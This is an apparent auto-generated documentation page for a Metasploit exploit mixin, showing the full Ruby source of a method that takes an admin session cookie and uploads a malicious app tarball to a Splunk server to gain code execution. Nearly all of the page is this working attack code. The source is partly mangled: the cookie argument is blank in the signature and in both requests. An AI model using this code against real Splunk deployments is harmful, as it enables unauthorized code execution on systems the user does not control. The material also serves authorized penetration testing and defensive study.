Module: Msf::Exploit::Remote::HTTP::Splunk::Apps
- Included in:
- Msf::Exploit::Remote::HTTP::Splunk
- Defined in:
- lib/msf/core/exploit/remote/http/splunk/apps.rb
Overview
This module provides a way of interacting with Splunk apps
Instance Method Summary collapse
-
#splunk_upload_app(app_name, cookie) ⇒ Boolean
Uploads malicious app to splunk using admin cookie.
Instance Method Details
#splunk_upload_app(app_name, cookie) ⇒ Boolean
Uploads malicious app to splunk using admin cookie
10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 10 def splunk_upload_app(app_name, ) res = send_request_cgi({ 'uri' => splunk_upload_url, 'method' => 'GET', 'cookie' => }) unless res&.code == 200 vprint_error('Unable to get form state') return false end html = res.get_html_document data = Rex::MIME::Message.new # fill the hidden fields from the form: state and splunk_form_key html.at('[id="installform"]').elements.each do |form| next unless form.attributes['value'] data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"") end data.add_part('1', nil, nil, 'form-data; name="force"') data.add_part(splunk_helper_malicious_app(app_name), 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"") post_data = data.to_s res = send_request_cgi({ 'uri' => splunk_upload_url, 'method' => 'POST', 'cookie' => , 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) vprint_error('Error uploading App') return false end true end |